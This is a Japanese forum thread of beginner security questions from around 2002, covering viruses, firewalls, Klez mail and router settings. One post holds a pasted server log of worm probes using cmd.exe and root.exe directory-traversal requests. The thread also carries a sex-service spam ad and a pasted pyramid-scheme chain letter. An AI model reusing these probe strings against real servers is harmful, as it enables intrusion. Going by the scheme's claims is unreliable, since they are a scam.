ノートンではトロイとして検出したみたいですが、防げなかったとです。

>>733
それがウィルスの名前なんですか？

(不謹慎)田代まさしゲーム
約1MB - ねずみ算的に分裂してゴミファイル作成、セーフモードで起動→分裂ファイル全消去で解決

(不謹慎)田代まさしゲーム
約1MB - ねずみ算的に分裂してゴミファイル作成、セーフモードで起動→分裂ファイル全消去で解決

今！うちの別のPCで、「知らない人から来たメールの添付ファイルを
あけた」。

それは、空けた本人によると「PIF]という拡張子のついたもので、とにかく
強制終了した、とのこと。

再起動できず。

困ったなぁ・・・・。

これって、ウイルスですよね。PCの再セットアップをすれば直るのでしょうか？

お教え願います。

>>736
すいません。もうだめだと思って、その場ですぐにフォーマットかけて
OS再インストールしたんです。でも防げなかったのがくやしいです。
教えていただいてありがとうございます。

だからさー・・・
MXで降ろしたexeなんか実行すんなと・・・

>>740
あぷろだにあったんですけど、間違ってクリックしたらしくて・・
これ新種のウィルスなんですか？

>>741
ファイル名何だった？

よろしくおねがいします

おめーさんよぉ
アプロダもMXも、相手が特定できないんだぜ？出元が特定できない
exeを何故踏めるの。ウィルス入ってなくても、そもそもそいつが
悪意があって、HDあぼーんさせよーってプログラムを作って
名前変えてあぷするなんてこといくらでも考えられるだろ。
とにかくなんでもかんでもexeは踏むな。

>>742
[433].exeだったと思いますがよく覚えていません。PC暦５年でなにせ
はじめてのことだったので、もう・・
昨日までここにあったやつです。もうあぷろだごとなくなってますけど。
ttp://www.mikoto.com/upload/img/

もしかして、スレ違いでしたか？

>>744
思わず踏んじゃったのでかんべんしてください・・

>>746
とりあえず、OS入れなおしで問題無いだろう。
とにかく添付は開くなと、きつく調教しておけ。
exe,com,pif,reg,bat
ここらへん絶対さわっちゃだめ。

>>746
http://www.ipa.go.jp/security/topics/mail_aware.html

はあ、、ノートンに情報送っとけばよかった・・（鬱

>>748
はいわかりました。今後気をつけます。というか拡張子もっとよく見る
ように注意しますです。。

オッオッ！
毎日新聞が夜中にオープンしたぞ（ｗ

毎日新聞、また落ちた…

>>748
ありがとうございます。
exe以外にもcom,pif,reg,bat らも、危険なんですね。

レスありがとう。

あ〜あ、せっかくの日曜が再セットアップかよぉ・・。

皆さんもお気をつけください。

ルータとXPのFWを入れてるのですが、これはセキュリティ対策として
どれくらいのレベルなのですか？

たとえば、お家の防犯対策にたとえると、セコムしたくらいの威力は
ありますかね？
それとも、戸に鍵をかけたくらいの効果かな？
教えてくださいおねがいします。

>>755
ルータを使ってるなら、それだけである程度は。

ルーターに穴があることもあるので、過信は禁物です。

ＰＣニュース板クリックすると、ノートン先生がウイルス見つけるんだけど
どうなってるの？

XPのFWはｳﾝｺだと思うけどね。
>>757
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

>>758
即レスサンキョ、
誤反応ですか、別に問題ないですよね？

無い。そこの2みれば大体内容がわかる

また即レスでサンキョ。
ありがとうございます。
ホントにくだらない質問でごめんね。

この板の人はみんながみんなXPのFW機能のことを糞っていうんですよね？
でも、ほんとに糞なんですか？その根拠をすこし教えてくださいますか。
天下のマイクロソフトが作ったものですぞ？？
信用に値しないのですかね？？

初心者にも分るレベルでおながおします。

「天下のマイクロソフトが作ったものですぞ」warata

天下のM$様が作ったOEはデフォでhtml読み、プレビュオンという
素晴らしい機能のおかげでウィルスの幅を広げなさった信用に値するﾒｰﾗです。
さすがM$。

て裕香、XPのFWは普通に低機能で、無いよりマシ程度。
雨が降ってきたとき傘持ってないからとりあえずシャンプーハットかぶろって程度。

>天下のマイクロソフトが作ったものですぞ？？

（　´,_ゝ`）ﾌﾟｯ

お前らよくそこまでマイクロソフトをコケに出来るもんだ。
お前らが快適なPCライフを送れるのはウィンドウズのおかげですよ？

で、XPのFWが糞な理由を教えて下さいよ。
頼みますよ？

糞糞言うんだったらその理由もいってくれないと、XPに対して
アンフェアですよ？

ﾈﾀだろな。
ポート毎しか設定できない、アウトバウンドの監視もできない
これで十分だと思ますが

快適なPCライフってｼﾞｬﾊﾟﾈｯﾄﾀｶﾀが言いそう

>>767
しっかりとOSの運用・管理ができてれば、その程度でも十分なんだけど、
ユーザーの大半が ―　

>>769
そんな事言ったら、適切なポートの管理してあるプロバで
共有とか全部きってまともな管理してればFWなんかいらない。
しかし>>766みたいな ―　

>>770
んぁ、ごめん。同意レスのつもりが、オブラートに包もうとした結果、
あらぬ誤解を ─

いや分かって ─

>>766 http://www.zdnet.co.jp/help/howto/security/special2/03.html

755黙っちゃったね。さっきの勢いはどこへやら。

お前よくそこまでマイクロソフトをマンセー出来るもんだ。
お前が快適なウィルスライフを送れるのはウィンドウズのおかげですよ？

で、>>767のレスに返答を書いて下さいよ。
頼みますよ？

マンセー言うんだったらその機能も把握してくれないと、セキュリティに対して
小学生並みですよ？

(´-`).｡oO（755逃げたな）

>>755=ヘタレMS社員

そうか、お前ら、いろいろ答えてくれてありがとう。

でもさ、そうやってすぐネタって決めてかかるのはお前らのよくない所だと思うよ。
そりゃぁさ、２ちゃんにいれば疑い深くなるのはわかるよ。
ブラクラもあればウイルスもある。
心ないことを書き込む輩もいる。

でもさ、だからといって人を信用しないのはよくないことだと思うんだ。
いったん心の窓を開けて、澄み切った心持ちでないと見えて来ない真実だってあるわけさ。

ましてや、このスレは右も左も分らないような私みたいな初心者が
藁をもすがる思いで質問するわけさ。

だからさ、その子たちに「氏ね」とか「逝ってよし」とか「（ ´,_ゝ`）ﾌﾟｯ」
とか言うのはさ、いけないことだと思うんだ。さみしいことだと思うんだ。

でもさ、やっぱりちゃんと返事を返してくれる、名無しさん＠お腹いっぱい。
は、根はいい子だと思うんだ。ほんとはやさしいさ。
だから、最後にこう言うな。ありがとうな。

とりあえず、775を755に直せと指摘してみるテスト

>>778
ここはすばらしいインターネットですよ。
私なんか、毎日リンクしてます。

ここは酷いインターナットですね。

>>778 どう言い訳しようか考えるのに時間掛かってたのね(w

>>755みたいな愚か者が「インターネットする」
などと、自信ありげにほざくんだろうな。

どうか、755を、俺のケツの穴に免じて許してやってくれ。

んでも、与えられた情報を鵜呑みにせずに、
懐疑的な目で見てるから、素質はあるなと。
自分で検証しちゃったりしたら、尚良かったけど。

ROMってたﾔｼにも勉強になったろうから755も役に立ったんじゃないか。

Win XPのファイアーウォール
http://pc.2ch.net/test/read.cgi/sec/1001149463/
リンク一つ貼れば十分だろう。

>>787 それ、半分糞スレ化してるから・・・

>>766-773読んだ方が良いな

ファイヤーウォール及びウイルスソフトを今日買いに行きます
関連スレは見ましたがどのソフトも良し悪しの様で
マカだけは買わないことに決めたのですが
今の段階で買うとしたら何がお勧めでしょうか？

ノートＰＣ　OSはMe　回線はADSL　ルーターはNEC　WARPSTARΔWBR７５H　無線接続です

>>790
FireWallはZoneAlarmでいかがでしょう。
初心者でも簡単に使えて安心。無料。
http://pc.2ch.net/test/read.cgi/sec/1020416762/

んで、物足りなくなったらステップアップ。

まかふぃーでいいんじゃないの？
月刊アスキーのレビューでは評価高いよ。軽そうだし。

漏れはNIS使ってるけど、別に良くも悪くもない。
フリーのやつも一長一短だしね。

つーかこれだけフリーで良いものが転がってるのに
何で金を出す必要があるの

サポートが付くからじゃないの

>>793
それは人の勝手

皆さん有難う御座います
ZoneAlarmはフリーで落としてきました
これで充分なのでしょうか？
もし充分なようでしたらウイルスソフトだけ買おうかと思っています

>>792
これは私もみました
実際買おうかなと思ってたら評判の良くないスレを見つけて
躊躇しておりました

>>796
＞これで充分なのでしょうか？
どのセキュリティーソフトにも当てはまるけど、
くれぐれも過信しないようにね。

>>798
承知しました
そのあたりはこれから関連スレで勉強していきます
ご忠告感謝いたします

すいません。。ＦＷのＩＧＭＰルールで「ＴＣＰＩＰ　kernel driver」ってのを
やたらとブロックするんですけど、これはなんなんでしょうか。

カーネルプロセッサの使用率というのが常に
１００パーセントなんですけど、何か関係あるんでしょうか？

>>800
おいおい下げてどうする？

ついさっきまで、CGIエラーとかいう画面が表示されて書き込めなかったんですが。
漏れだけっすか？

>>801
すいません下げ癖がついていて（鬱）
上げます

>>800
インかアウトで違うよ。ウイルスチェックはした？

PCを禁止しているiモードのサイトにPCから行くことは不可能ですか？

>>805
ヘッダのUSER-AGENTを変更？

DoCoMo/1.0/N504i/c10/TB
とか

>>806
ちょっとそれだけだと良く分かりません・・あほでごめん。
このスレ行け！でもいいんでも少し教えて下さい。

最近たまにパソコンから「ガガッ、ガガッ」
って音がしてフリーズして、そのしばらくあとに「Ｃディスクに書き込めません。
（Ｄのときもある）ファイルが見当たりません」みたいなエラーメッセージが
でるのですけど、この症状はなんなのでしょうか？
そのあとすぐに起動しようとすると「insert disk ,push enter key」なるメッセージが
出て起動することもできません。
しばらく時間を置いて起動すると普通に起動するのですが・・・
ウイルスチェックはしましたがなにも検出されませんでした。
窓98を使っています。

おしえてください。
Qttaskってなんですか？

>>809
http://www.computing.net/windowsme/wwwboard/forum/24688.html

-------風俗の総合商社・ＭＴＴどこでも-------

〇デリバリーヘルス〇デートクラブ〇女性専用ホストクラブ〇
〇ハードＳＭ奴隷クラブ〇レズビアン倶楽部〇ホモ・オカマ倶楽部
〇変態痴女と遊ぶ会〇痴漢・覗き趣味の会〇変態同好会・各種！
●楽しく遊べます！　090-8002-8356番
-----------美男・美女会員など多数在籍中-----------
　 http://www.mttdocomo.jp/
-----女性アルバイト随時募集・高収入（日払い）月100万円可能-----
-----レズビアン・スタッフ●ホモスタッフ●女性専用ホストスタッフ同募-----
http://www.mttdocomo.jp/
------------------------------------------------

>>806

いまどきUSERエージェントで、
弾いてるところなんて､希少だと思われるが､､､

『不正アクセスにお悩みの貴女へ』
http://pc.2ch.net/test/read.cgi/sec/1025970673/l50

ここのＵＲＬをクリックしたとたんに、
「ＶＥＳ　Ｌｏｖｅ　Ｌｅｔｔｅｒ・Ａに感染、修復できませんでした。」
と、ノートンが・・・。
ウィルスに感染してしまったのでしょうか？イタズラでしょうか？

何なんですかぁああああ（涙）
どうぞ、よろしくお願いいたします。

放置プレイ中

　　　　餌を与えないで下さい。
　
　　　　　　　　　　　　　　　　　　　−園長−

>>813
またか。ここ見てくれ。
http://pc.2ch.net/test/read.cgi/sec/1025872269/

>>808
それ、HDDいかれかけてんじゃないのか？
無事なうちにデータなどを救出しておいてから
スキャンディスクとかやってみるべきじゃないかな。

>808
>816さんも言ってるけどスキャンディスクをするべき。
標準チェックじゃなくて完全チェックの方にしないと駄目だぞ。

>>815様
うわ〜、ご親切にありがとうございます。
お陰さまで眠れます。
本当に感謝してます。

>>804レスありがとうございます！

遅レスすみません。今見たら全部アウトでした。
ウィルスチェックはしてるんですが、ちょっと古いソフトなので
本当にチェックできているかどうか不安ではあります。
ウィルス反応はなかったです。

ウィルスチェックソフトは最新でなくては意味が無い。

>>819
パターンファイルをちゃんと更新しろ

本当に下らない質問で申し訳ないんですが
ルータにDHCPサーバでプライベートIPの児童割り振りしてると
息継ぎ現象があると聞きまして、思い当たる父子があるので
手動で固定にしたいのですが、上手くいきません。
コントロールパネル→ﾈｯﾄﾜｰｸのTCP/IP -> (LANカードのドライバ)
のプロパティで、IPアドレスのところを192.168.1.2、
ゲートウェイに192.168.1.1を追加したんですが、再起動後
インターネットに接続できていません。ルータの方でDHCPサーバをオフ
にしても同じです。どこがおかしいのか分かる方、もしくは、サイトなどでも
いいので教えて頂けないでしょうか。

↑
書き忘れました、OSはwin95OSR2、
ルータはPLANEXのBRL-04Fです。

>>822
板違いだけど、ルータのアドレスは192.168.1.1で正しいのでしょうか？
あと、サブネットマスクも設定しましたか？

macafee ファイアーウォールでさっきから３０回くらい俺のＰＣに
接続しようとしてるのがいるんだけど、何なんですか？？？？
昨日はじめてファイアーウォール買ってきたんだけど、昨日も
３０件以上接続しようとするのがあった。

>>822
ルーターのLAN側のIPアドレスは192.168.1.1？
Win95のDNS設定は、DNSサーバーをルーターにしてる？

>>825
放って置きましょう

>>824
すんません、もうしわけないです。
ルー他のアドレスは間違ってないです。
>>826
はい、DNSサーバの設定弄ってませんでした・・・
ここはプロバから通知されてるDNSサーバのアドレスを指定するのですか？
ルータのアドレスにすればいいのでしょうか？
ちょっとためしてみます
板違いほんとすみません。

>>828
PlanexのHPざっと見てきたけど、たしかにルータのアドレスは192.168.1.1で
間違っていないようですね。
あとはハード板の↓のスレで聞いたほうがいいかも。

プラネックス(Planex)のブロードバンドルーター 2
http://pc.2ch.net/test/read.cgi/hard/1020206357/l50

>>829
わかりました〜、そちらで聞いてみます、レスありがとうございます
板違い質問すみませんでした。

>>825
大体はワームに感染したサーバが送ってくるゴミなので
サーバを稼動させていたりファイアーウォールソフトでの設定がずさんなものでない限り大丈夫な筈です。

jdbgmgr.exe(テディベアのicon)
て、ウイルスなんですか？？？

>>831
ありがとうございます。アメリカのシアトルやニューヨークとか
イタリアのミラノとかいろいろな場所からだったので、余計にびびり
ました。

>>832
たまには自分で調べろ。

http://www.google.com/search?q=jdbgmgr.exe&hl=ja&lr=lang_ja

うん。デマだったんだね。どうも。
>>834

>>835
そのファイルに悪意のあるプログラムを仕込むウィルスもあるから、
気をつけなよ。

友達から「あなたからワーム３２のウイルスメールが最近良く来る」
と指摘されて、ウイルスチェックしたんですが見つかりません
このような場合相手に原因があるんですか？
こちらはウイルスバスター2002で探しました

CELLPADDINGっていう、件名のメールがきたんだけど
これってウィルスですか？？

>>837
メールヘッダは見た？

＞８３９さん
見てないんです

８３７の追加ですが、アドレスに登録してある
他の人にはそんなメールは届いていません。
その子一人だけなんです

クレズ（WORM_KLEZ）

このようなタイプのワームでは、「差出人」を感染コンピュータ内で取得した任意のメールアドレスとして設定する場合があります。
そのため「差出人」として設定されているメールアドレス使用者のコンピュータが感染しているとは限りません。

近頃ネット接続がすこぶる良好なんですが何ででしょうか？
いつもルーターのコンセント抜いたりしたら中々繋がらない
のに今日はなんとパソコンの電源を入れてからコンセントを
入れても二回目で繋がりました。いつもは抜いたらパソコン
の電源を入れたらすぐにコンセントを挿さないと駄目だった
のに。

皆さんはなんでだと思いますか？自分は多分ハッキングか何か
されてるんじゃないか不安なんです。どっかのポートが勝手に
開けられたりしてるんじゃないのかとか、速度も異常にはやい
んです。

>>843
ただ単に本領発揮してるだけ

＞８４２さん
という事は私が原因じゃないんですね
その子は他からも毎日のようにウイルスメールが来ると言ってました
最近感染して大変だったとか

>>845
ウイルス対策ソフトがきちんと更新されており
それでウイルス検索をされて何も発見されなければ心配ないはずです。

＞８４６さん
最新版に更新してからチェックしました

>>844
即レスありがとうございます、本領発揮しているならそれはそれで
喜ばしい事なんですが（ｗ）大丈夫ですよね？

毎回、ネットに接続したとたんに、
SYSTEMという名前（拡張子不明）のプログラム？が
udpとtcpでローカルポート１３７から１３９に対して何かをしようと
待機中(listening)になるんですが、これは何をするつもりなのでしょうか。。

検索してもどのＳＹＳＴＥＭだかわからないんです。

NetBIOS over TCP/IP

ntoskernel.exeかな

eroeroserverというサーバにアクセスしようとしたんだけど、なんか全然
つながりません、どうやったらつなぐことができるんですか、誰でもいいから
おしえてください。

>>852
セキュリティとどう関係あるのかと(以下略

eroeroserverのあるところまで行ったら、
服のほつれを引っ張ってごらん、多分、繋がると思うよ。



混んでるんだろ。今日はオナニーするなってことだ。神の思し召し。

しかもマルチだし

厨な質問で申し訳ありません。
J-COMですが公開プロキシ規制で書き込めないので、２ちゃんねるだけ
プロキシを使用しないようにしたいのですが「LANの設定」→「プロキシサーバー」
→「詳細設定」にある「例外」欄には何と入れたらいいのでしょうか？
「；2ch net」と入れてみましたが、はじかれてしまいました・・・
セミコロンをとってもダメでした。

よろしくお願いします。

>>853　だってくだらない質問はここに書けといっているもんだから・・・

>>854　教えてくれ有難う、今日はオナニーしないでもう寝るよ、でもしたかったよー

>>856
*.2ch.net

>>858
*.2ch.netをコピペで貼ったらうまくいきました。
有難うございました。

いえいえ。

ＶＢ２００２で、ユーザー期限が過ぎたのですが、
なぜか今までどおりアップデートできます。
・・・仕様なのでしょうか？

MP3からウィルス感染することがあると聞いたんですが、
どういう原理で感染してるんですか？
ウィルス付きEXEであってもバイナリエディタで開けば無害なのに、
MP3をただのMP3プレーヤーで起動だけで感染し得るんでしょうか？
それとも、Windowsメディアプレーヤーの脆弱性を利用するとかですか？
(その場合、他のプレーヤーでも問題は起こり得るでしょうか？)

拡張子がmp3だからといって本当にMP3とは限らないしね。

ていうか聞いたことねーぞ
それと本当にmp3じゃなかったらプレーヤーで開けなくて終わりだろが

>>816>>817
レスありがとうございます！昨夜もフリーズしました・・・・（汗
とりあえずデータのバックアップ取ってスキャンディスク
やってみます。

半年ぐらい前にMP3で感染させる方法が見つかったとか
ZDNetあたりのニュースサイトで見たな。

まあなぷすた系共有ソフトの全盛期だったから、
それを抑止するために流されたデマだったかも知れんね。

ここに書いてありますが、これもデマ？
ttp://mxtrojan.tripod.co.jp/#d

YAHOO、逝ってます？

逝ってます。

逝ってるね、確かに＞ahoo

http://211.14.13.222/
の方でたまに繋がる。

http://www.trendmicro.co.jp/hcall/index.asp
ここ以外にオンラインでウィルスチェックできる所教えて下さい。

>>872
http://pc.2ch.net/test/read.cgi/sec/1015584020/

>>850-851
レスありがとうございます。。。

>ntoskernel.exe
これ、検索したらuser.datというファイルの中で
書き込まれてるのは見たんですけど、本体がどこにあるのか
わかりません。。。何か良くないファイルなんですか？

ノートンってクラック防げんの??

ノートンって単一の製品名ではないよ。

VBS.LoveLetterなるウイルスが検出されました。
これはやばいウイルスでしょうか？

あとノートンアンチウイルスを使っているのですが
修復できないらしいです。感染はまぬがれたみたいですが・・・
まだPC内にウイルスを持っている状態です。
どうすればいいの？

>>877
こんなのって話題になってないかなあ、なんて
スレッドのタイトルをつらつらと眺めてみると
いいこともあるよ。いつもとはいわないが。
http://pc.2ch.net/test/read.cgi/sec/1025872269/

>>878ありがとう。ノートン導入して２年目にして初のウイルス
検出だったんで、かなり動揺しました。

初心者の質問板で回答が得られなかったため、移動する旨を伝えてこちらに来ました。
改めて質問します。

【万世一系】 皇后陛下にレーザー照射 【八紘一宇】
http://tmp.2ch.net/test/read.cgi/sisou/1025625104/l50

1 ：日出づる処の名無し ：02/07/03 00:51 ID:53oVivVP
これをもう一度良く見てくれ。
皇后陛下に謎のレーザーが照射されているぞ！

http://www.asahi-net.or.jp/~he9n-tkis/oobakamono.mpg

皇后さまの服に注目。
天皇陛下の訪韓なんて今世紀中は絶対反対！　マジ危ない。

みんなに知って欲しくてスレ立てました。

7 ：右や左の名無し様 ：02/07/05 03:01 ID:RYQQvK9Z
>>1
のリンク、やばいんじゃないのか？
コメットクラスターがCドライブに入ったぞ。
---------------------------------------------------------------

とのことなんですが、コメットクラスターっていうのは何ですか？
リンクを踏んでしまったのですが。

厨房の寝言くらい脳内でフィルタリングできんのか・・・

ウイルス対策にＡＶＧを使っているのですが、アップデートしようとすると
ノートンファイヤーウォールがじゃまをするようです。

拡張オプションをさわってみたりしましたが、どうにも、上手くいきません。

どなたか、解決方法をご存知の方、お教え願えませんでしょうか。

ファイヤーウォール

>>882
アップデートのときだけファイヤーウオール切れば

ちょっと前、ニュー速＋のデータが消えたけど
あれはなんだったんですか？

>>885
アパッチの穴をまともに付かれたらしいっす。

>>885 http://kaba.2ch.net/accuse/で聞いて来い

あの・・・ntoskernel.exeって何なんでしょうか。
重ね重ねすみません。

関係ないですけど今、この板来たとたんin_addr.btopenworldcomって
やつ３回連続でブロックしました。。

ツールでクッキーの中の暗号化されたパスを複合するモノがあると聞いたんですが、
詳しいこと知ってるからいらっしゃいます？？

>>888
OS何?

すんません、これまた馬鹿な質問っす。
「アリ！」「ナシ！」で、アンケートじゃないけど大勢の人から即レスほしいんですけど。

日本国内で利用されていて、企業とかじゃなくて個人で、プリインストール版で、日本語版じゃない他言語版パソを見たことある人って、何人いますか？
漏れは3回程度しかないんですけど。

ちなみにWindowsの話っす。

http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgiに繋がりませんが。。。

自分が年を取ったって実感中。

どうも煽りスキル低下中っす。
漏れの質問、無視して下さい。

アイディアが浮かばん。。。。

>>891 - >>894
こっちは、見ようと思えば各国語 win が見えるが、何か？
ちなみに自分は一部に日本語版 win に英語版 anti-virus
入れてるが。

anon.free.anonymizer.com:80

一般的な情報
REMOTE_HOST 168.143.113.132　
REMOTE_ADDR 168.143.113.132　
HTTP_REFERER (none)　
HTTP_USER_AGENT . Mozilla/4.78 (TuringOS; Turing Machine; 0.0)
HTTP_ACCEPT . image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE . ja
HTTP_ACCEPT_ENCODING . identity
HTTP_HOST . www.taruo.net
その他の情報
HTTP_CONNECTION . (none)　
判定
168.143.113.132 (168.143.113.132)
判定：プロクシです proxy判定箇所が 1箇所、疑惑点が 0箇所ありました。
漏れ判定：漏れてはいないようです
総合評価：A+

極めて物静かなproxyです。proxy経由であることを示す情報がほとんどありません。


この串使える？

218.43.168.*** - - [10/Jul/2002:00:05:57 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
218.43.168.*** - - [10/Jul/2002:00:05:57 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
218.43.168.*** - - [10/Jul/2002:00:05:57 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
218.43.168.*** - - [10/Jul/2002:00:05:57 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
218.43.168.*** - - [10/Jul/2002:00:05:57 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
218.43.168.*** - - [10/Jul/2002:00:05:58 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
218.43.168.*** - - [10/Jul/2002:00:05:58 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
218.43.168.*** - - [10/Jul/2002:00:05:58 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
218.43.168.*** - - [10/Jul/2002:00:05:58 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
218.43.168.*** - - [10/Jul/2002:00:05:58 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
218.43.168.*** - - [10/Jul/2002:00:05:58 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
218.43.168.*** - - [10/Jul/2002:00:05:59 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
218.43.168.*** - - [10/Jul/2002:00:05:59 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
218.43.168.*** - - [10/Jul/2002:00:05:59 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
218.43.168.*** - - [10/Jul/2002:00:05:59 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
218.43.168.*** - - [10/Jul/2002:00:05:59 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

韓国や中国からはこんなの毎日きますが、
日本の方からきたの初めてです。
しかもかなりしつこいので困ってます
どうしたらよいでしょうか？

そのワームはIIS動かしたりしてなければ放置しｔめおいしょう。

HP閲覧中に、自分は何もしてないのに、突然PCが強制終了してしまった
のですが、何なんですか？ハッキングでしょうか？ゾーン・アラームを
常駐していたのですが、警告も何もなかったです。

>>898
IISは動かしてないんでしばらく放置しときます。
ありがとう
>>899
MS社のOSを使ってたらたまにあります。
PCが落ちるのはハッキングされるより、
環境が不安定なためであったりすることが多いと思われ。

既出かも知れないけど、電波板にアクセスしたら
VBS.LoveLetter.Varをﾊｹｰﾝしたでつ。
ノートン先生が。

>901
ttp://pc.2ch.net/test/read.cgi/sec/1025872269/
ｶﾞｲｼｭﾂだと思ったら過去レス読め。
このスレで１０回以上出てるぞ。

age

今日はじめて知って、今kernelアップデート中なんだけどformatのセキュリティホールって
具体的にはどうするとセキュリティホールなんですか？

これだから犬厨は…

↑つうかこの板の他の人よりはセキュリティー板らしい質問だと思うんだけど．．．

つうかUNIX使いはLinuxのどこが気に入らないんですか？
まあ、自分も含めて全体のレベルが低いのは確かですが、ユーザー数が多いので仕方ないでしょう。

素直に疑問

差出人　Mail Delivery Subsystem
件名　Returned mail: see transcript for details

　というメールが最近頻繁にやってきます。自分からメールを出したときで無くてもこれがやってくる場合ってあるんでしょうか？
　Klezが入っていたものも（入っていないものもあった）あって、心配です。

　ウイルススキャンしてみても特にパソコンが感染している様子は無いんですけれど...

>907
Klezで送信者が907で受取人が存在しないものに設定された場合届くかもね。
直接Klezが届く事はないのかい？

>908
　いえ、直接届いたことはまだありません。
　必ず上記のメールで

ATT000**（**は数字）.dat
と、もうひとつ名前がランダムで1KBほどのファイルが添付されてきます。

　メールサーバの会社からVIRUS ALERTのメールで警告も来ました。ただ、そのメールに
＞ウィルスの種類によっては、差出人を詐称するものもございます、心当たりが無ければ云々
　とあったので、それかな？とも。

　ホームページで連絡用に公開しているメールアドレス宛てに来るので、名前を騙られているだけかも...とはいえ不安ですが。

http://dms100.org/worksucks
あの、これを踏んでしまったんですが、どうなりますか？
ウィルス警告が出てたのですが、同時にグロ画像がたくさん出てきたので
パニクってスイッチ切ってしまいました。今スキャンしてますが、かなり
時間がかかるので気になって仕方ありません。

誰か、上のについて知ってる人がいたら教えてもらえませんか？

さっきからね、ぞぬがなりまくってて、
調べたら何か韓国からアクセスがあるようなんですが、
これはだいじょうぶなんすかね？
6699と5000とhttpへのアクセスが多いです･･。

>>910
どうなりますかって・・・
自分でどうなったか書いてるじゃん

>>910
俺は簡単なHTMLしかわからんヘタレなんで詳しい説明はできんけど、
中で1ame.htmlとlame.htmlの２つが呼び出されてて、それぞれウィンドウが開く。
1ame.htmlのほうは音が鳴るだけ。lame.htmlのほうは、ブラクラチェッカー

http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi

にかけたら、「無限 JavaScript」警報と出た。
ソースを見ようと思っても「ウィルスがある」とノートン先生に邪魔されて見れない。
たぶん大丈夫とは思うが、俺も小心者なのでこのへんでやめておく。

そういうわけで、電源プッチンによるダメージをとりあえず心配しとけばいいんじゃないの？
今後はJava ScriptやActive Xの設定をオンにしたまま怪しいページに行かないように。

てかJSとActiveXなんか常時オフだろ
踏んだけどゲイの絵でてきて終わりでがっかりだよ

Win2k.IE6.フレッツADSLでRASPPPOEを使って接続しています
Sygate Personal Firewallを入れたのですが、デフォルトの状態では
ネットに接続出来なくなってしまいました。
ログを見たのですが、PPPoE接続で使うドライバーみたいなものが、
IPアドレス0.0.0.0を通信したがってたみたいだったので、許可したところ
ネットに接続できるようになったのですが、これは間違ってるんでしょうか?
知ってる人がいたら、ヒントだけでも欲しいです。　おながいします

0.0.0.0ってのは特に指定していないアドレスすべてを指す。
それでかまわん。

>>916
わかりました、どうもありがとうございました。
心配だったんで助かりましたー

先日、下記のメールが配信されました。
この内容には間違いがあり、違法性があるという指摘を受けました。

大変ご迷惑をお掛けしました事を深くお詫び致します。

つきましては、絶対に振り込みなどなさらないようにご注意下さい。
また、万が一、すでに振り込みを行われた方はご連絡をお願いします。

連絡先は　*****@*****.cx　にお願いします。
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
これは、アメリカより上陸しましたニュービジネス感覚のゲームです。

■■たったの3000円が大金に化ける！！■■■
★遊びのつもりがびっくり仰天。
★必要なのは3000円と比較的低金額だったので参加してみました。
★おこづかいを稼ぎたい人は最後まで読んでみてください。
★アメリカで大人気のニュービジネスゲーム！！
★これは宝クジと違いあなたの努力次第で結果がでます。

◆例えば・・・（少なく見積もって、１週間に３人ずつ参加すると過程して...）

＊１週間目で３件分の入金（リストの一番下にあなたの名前が）
　　　　　　1000円×3人で・・・3000円入金！
　
＊２週間目で、その３人が新たに３人分の入金を得ます（リストの中段に名前が）
　　　　　（3人×3人）×1000円で・・・9000円入金！！

＊３週間目で、その９人が３件の入金を得ると・・・（リストの一番上に名前が）
　　　　　（9人×3人）×1000円で・・・2万7千円入金！！！

フレッツＡＤＳＬの８Ｍを利用しています。
経路情報のGateway Adressで「１２７．０．０．１」が出てきました。
ＩＰドメインサーチで調べたところ、
IANA (LOOPBACK)
Internet Assigned Numbers Authority
4676 Admiralty Way, Suite 330
Marina del Rey, CA 90292-6695
US

Netname: LOOPBACK
Netblock: 127.0.0.0 - 127.255.255.255
と、いう結果でした。
これは、米国へ国際電話をかけているのでしょうか？
初心者なもので、よろしく、お願いいたします。

>920
面白いね。でも全く違うよ。どこから国際電話が出てくるのだか・・・。
http://www.asgent.co.jp/isf/internet/tcpip/address.html

>>920
127.0.0.1ってのは、loopback

早い話が自分。

warota.....

つーかこんな初心者にWhois教えた奴は死刑だな

しかもこんな日曜の朝っぱらから、先に2ﾚｽもついてるとはびっくらこいた

>>921,922
お騒がせしました。
「LOOP BACK」を勉強しました。
安心できます。ありがとうございました。
>>923
教えてもらったわけではなく、無い知恵搾って、検索したのですが(^^ゞ